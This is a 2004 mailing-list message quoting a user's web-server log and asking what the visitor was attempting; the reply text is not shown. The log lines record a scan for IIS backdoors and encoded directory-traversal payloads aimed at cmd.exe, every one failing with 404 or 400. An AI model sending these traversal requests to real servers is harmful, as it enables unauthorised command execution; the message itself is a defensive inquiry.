-Matt
On Apr 18, 2004, at 11:05 AM, Dick Applebaum wrote:
> Watching��my logs, I see the entries below:
>
> What is he trying to do?
>
> TIA
>
> Dick
>
> 67.167.119.243 - - [18/Apr/2004:07:59:18 -0700] "GET��
> /scripts/root.exe?/c+dir HTTP/1.0" 404 308
> 67.167.119.243 - - [18/Apr/2004:07:59:18 -0700] "GET��
> /scripts/root.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:18 -0700] "GET��
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 306
> 67.167.119.243 - - [18/Apr/2004:07:59:18 -0700] "GET��
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:18 -0700] "GET��
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
> 67.167.119.243 - - [18/Apr/2004:07:59:18 -0700] "GET��
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:19 -0700] "GET��
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
> 67.167.119.243 - - [18/Apr/2004:07:59:19 -0700] "GET��
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:19 -0700] "GET��
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
> 67.167.119.243 - - [18/Apr/2004:07:59:19 -0700] "GET��
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
> "-"��
> "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:20 -0700] "GET��
>
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
> c+dir��
> HTTP/1.0" 404 347
> 67.167.119.243 - - [18/Apr/2004:07:59:20 -0700] "GET��
>
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
> c+dir��
> HTTP/1.0" 404 347 "-" "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:20 -0700] "GET��
>
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
> c+dir��
> HTTP/1.0" 404 347
> 67.167.119.243 - - [18/Apr/2004:07:59:20 -0700] "GET��
>
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
> c+dir��
> HTTP/1.0" 404 347 "-" "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:20 -0700] "GET��
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
> winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363
> 67.167.119.243 - - [18/Apr/2004:07:59:20 -0700] "GET��
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
> winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:21 -0700] "GET��
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 67.167.119.243 - - [18/Apr/2004:07:59:21 -0700] "GET��
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> "-"��
> "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:21 -0700] "GET��
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 67.167.119.243 - - [18/Apr/2004:07:59:21 -0700] "GET��
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> "-"��
> "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:21 -0700] "GET��
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 67.167.119.243 - - [18/Apr/2004:07:59:21 -0700] "GET��
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> "-"��
> "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:22 -0700] "GET��
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 67.167.119.243 - - [18/Apr/2004:07:59:22 -0700] "GET��
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> "-"��
> "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:22 -0700] "GET��
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 313
> 67.167.119.243 - - [18/Apr/2004:07:59:22 -0700] "GET��
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 313��
> "-" "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:23 -0700] "GET��
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 313
> 67.167.119.243 - - [18/Apr/2004:07:59:23 -0700] "GET��
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 313
> "-"��
> "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:23 -0700] "GET��
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
> 67.167.119.243 - - [18/Apr/2004:07:59:23 -0700] "GET��
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> 330��
> "-" "-"
> 67.167.119.243 - - [18/Apr/2004:07:59:24 -0700] "GET��
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
> 67.167.119.243 - - [18/Apr/2004:07:59:24 -0700] "GET��
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
> "-"��
> "-"
>
[Todays Threads] [This Message] [Subscription] [Fast Unsubscribe] [User Settings]
